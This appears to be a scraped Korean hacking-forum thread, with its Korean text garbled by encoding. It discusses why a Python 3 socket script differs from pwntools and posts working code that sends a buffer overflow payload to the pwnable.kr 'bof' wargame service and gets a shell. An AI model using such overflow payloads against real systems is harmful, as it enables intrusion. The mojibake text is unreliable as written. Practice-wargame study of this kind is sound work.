|
|
|
|
|
|
|
|
|
|
|
|
|
1574, 74/79 |
|
ocal | |||||||
pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ? | |||||||
http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=1987 [º¹»ç]
Hit : 2348 Date : 2020/01/09 01:38
|
|||||||
±ºÀÎ | python3 ¹öÀüÀ» ÀÌ¿ëÇÏ½Ã´Â°Í °°³×¿ä. ±â´É¸é¿¡¼´Â socket°ú pwntools´Â ¶È°°½À´Ï´Ù. ´Ù¸¸, python3ÀÇ encode() ÇÔ¼ö ¶§¹®ÀÎ°Í °°Àºµ¥ \xbe\xba\xfe\xca ÀÌ·¯ÇÑ Á¤»óÀûÀÎ ASCII ¹üÀ§¸¦ ³Ñ¾î³ °ªµéÀ» encode() ÇÔ¼ö·Î ó¸®ÇÒ ½Ã ³»¿ëÀÌ ¹Ù²î°Ô µÇ´Â Çö»óÀÌ ÀÖ¾î¼ ±×·±°Í °°½À´Ï´Ù. |
2020/01/09 | |
ocal | ¿ÀÈ£ ±×·¸±º¿ä ±× ºÎºÐÀ» Çѹø °íÃĺ¸°Ú½À´Ï´Ù. | 2020/01/10 | |
ocal | ¿À Á¤¸» ±×·± °Í °°³×¿ä. payload¸¦ ÆÄÀ̽㠹®ÀÚ¿·Î ¾²Áö ¾Ê°í óÀ½ºÎÅÍ bytestringÀ¸·Î ÀÛ¼ºÇؼ str.encode() ¸Þ¼Òµå¸¦ ¾²Áö ¾Ê°í ¹Ù·Î º¸³»¸é Àß µË´Ï´Ù. °¨»çÇÕ´Ï´Ù. ¾Æ·¡´Â °íÄ£ ÄÚµåÀÔ´Ï´Ù. #python3 import socket X = socket.socket() X.connect(("pwnable.kr",9000)) payload = b"A"*0x34 + b"\xbe\xba\xfe\xca" + b'\n' X.sendall(payload) X.sendall("id\n".encode()) print(X.recv(0x100)) °á°ú: b'uid=1008(bof) gid=1008(bof) groups=1008(bof)\n' |
2020/01/10 | |
±ºÀÎ | ^_^ | 2020/01/13 | |
|
|